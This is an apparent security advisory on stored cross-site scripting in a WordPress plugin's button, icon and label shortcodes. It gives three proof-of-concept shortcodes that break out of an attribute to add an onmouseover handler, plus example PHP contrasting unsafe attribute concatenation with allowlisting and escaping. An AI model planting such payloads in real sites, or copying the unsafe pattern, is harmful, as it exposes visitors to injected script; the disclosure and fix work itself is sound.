The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
Insert any of the following shortcodes in a page/post:

* Button shortcode: [lana_button size="md" type='" onmouseover="alert(1)" style="background:red;"']Lana Button[/lana_button]
* Icon shortcode: [lana_icon name='home" onmouseover="alert(1)" style="background:red;"']
* Label shortcode: [lana_label type='" onmouseover="alert(1)" style="background:red;"']New[/lana_label]
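
The class of fix for the attribute handling described above, as an added example that is not the plugin's own code: a shortcode callback that validates `type` and `size` against an allowlist and escapes on output, next to the unsafe pattern. The `demo_*` names, the `demo_button` tag, the markup and the allowed values are assumptions made for illustration; the page does not show the plugin's source.

```php
<?php
/**
 * Plugin Name: Demo hardened button shortcode (added example)
 */

// Hypothetical allowlists: the values the real plugin accepts are not given on the page.
const DEMO_BUTTON_TYPES = array( 'default', 'primary', 'success', 'danger' );
const DEMO_BUTTON_SIZES = array( 'sm', 'md', 'lg' );

// Unsafe pattern (assumed shape, shown for contrast and never registered):
// attribute values are concatenated into the tag as-is, so a double quote in
// "type" ends class="..." and whatever follows is parsed as new attributes.
function demo_button_unsafe( $atts, $content = '' ) {
	$atts = shortcode_atts( array( 'size' => 'md', 'type' => 'default' ), $atts );
	return '<a class="btn btn-' . $atts['type'] . ' btn-' . $atts['size'] . '">' . $content . '</a>';
}

// Validation step: accept only known values, otherwise fall back to the default.
function demo_pick( $value, array $allowed, $fallback ) {
	return in_array( $value, $allowed, true ) ? $value : $fallback;
}

// Hardened callback: validate first, then escape at the point of output.
function demo_button_hardened( $atts, $content = '' ) {
	$atts = shortcode_atts(
		array( 'size' => 'md', 'type' => 'default' ),
		$atts,
		'demo_button'
	);

	$type  = demo_pick( $atts['type'], DEMO_BUTTON_TYPES, 'default' );
	$size  = demo_pick( $atts['size'], DEMO_BUTTON_SIZES, 'md' );
	$class = 'btn btn-' . $type . ' btn-' . $size;

	// esc_attr() encodes quotes and angle brackets, so even if the allowlist
	// is later loosened a value cannot break out of the class attribute.
	// wp_kses_post() limits the enclosed content to markup allowed in posts.
	return sprintf(
		'<a class="%s">%s</a>',
		esc_attr( $class ),
		wp_kses_post( $content )
	);
}
add_shortcode( 'demo_button', 'demo_button_hardened' );
```

With the hardened callback, a `type` value containing a quote fails the allowlist check and the button renders with the default class.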